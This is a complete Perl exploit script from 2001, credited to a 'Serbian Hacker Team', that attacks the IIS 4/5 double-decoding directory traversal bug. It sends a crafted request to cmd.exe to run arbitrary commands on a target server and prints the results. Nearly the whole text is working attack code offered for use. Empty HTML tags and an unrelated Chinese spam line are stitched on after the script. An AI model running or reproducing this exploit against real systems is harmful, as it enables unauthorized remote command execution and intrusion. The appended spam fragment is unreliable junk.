#!/usr/bin/perl # Made on 19.05.2001 by SHT (Serbian Hacker Team) # - by : **W** # This little piece of code try's to exploit the double decoding BUG on IIS 4 & 5 # Its maybe even easyer to do this in browser but i remember me @ start (newbie) # # Anyways here it is. use Socket; if ($#ARGV<1) {die "Syntax: cgidecode IP:port command\n";} ($host,$port)=split(/:/,@ARGV[0]); $host = inet_aton($host); $cmd=@ARGV[1]; my @results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+$cmd HTTP/1.0\r\n\r\n"); print @results; sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$host)){ my @in; select(S); $|=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Unable to connect...\n"); } } 
    <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
    <pre id="vvttv"></pre>
      <p id="vvttv"></p>

          

          <p id="vvttv"></p>
                <p id="vvttv"></p>
                

                <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>
                  
<output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>
                    <p id="vvttv"></p>
                    

这里只有精品视频